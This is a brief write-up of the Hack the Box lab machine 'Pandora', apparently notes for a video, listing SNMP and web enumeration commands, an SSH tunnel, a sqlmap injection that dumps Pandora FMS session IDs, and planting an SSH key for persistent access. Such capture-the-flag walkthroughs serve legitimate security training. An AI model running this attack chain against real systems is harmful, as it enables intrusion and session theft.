Hack the Box : Pandora

snmp-check returned many, so I first missed user & password and proceed with snmpwalk.

Finding a tiny info from vast output can be pain.

Replacing “tar” that has no full path was fun part.

Hack the Box : Pandora

enumeration, read exe files, Software certain ver that has vulnerability.Linpeas.sh reveals so much info.00:1...

www.youtube.com

00:17 feroxbuster

feroxbuster -u http://10.10.11.136 --force-recursion -C 404,405 -m GET,POST

00:31 UDP port scan

 nmap -sU -v 10.10.11.136

00:39 SNMP enumeration

161 is SNMP here

sudo nmap -sU -A -PN -n -p 161 -script=snmp-sysdescr 10.10.11.136

onesixtyone  10.10.11.136 -c /usr/share/doc/onesixtyone/dict.txt

snmp-check -p 161 10.10.11.136

somehow also tried snmpbulkwalk.

I decided to not use -Cr option, as timeout happens when set it greater than default value(10).

This may be my local machine spec issue.

-t is for timeout sec.

snmpbulkwalk -Cr10 -c public -t 20 -v2c 10.10.11.136 . > snmpbulkwalk

01:31 ssh tunnel

ssh -L 80:localhost:80 daniel@10.10.11.136

01:47 Pandora FMS 742: Critical Code Vulnerabilities

Here, vulnerability is well explained.

And why SQL below reveals session ids.

sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump

Adding your own pub key, so you can ssh

1. prepare new key pair for this purpose only

ssh-keygen  -f pandora.key

then we have pandora.key & pandora.key.pub

2. mkdir .ssh below matt’s home directory, add authorized_keys file.

mkdir .ssh
chmod 700 .ssh
touch authorized_keys
chmod 600 authorized_keys

3. Copy&Paste pandora.key.pub to authorized_keys

Echo ****pub key*** > authorized_keys

4. login

ssh -i pandora.key matt@10.10.11.136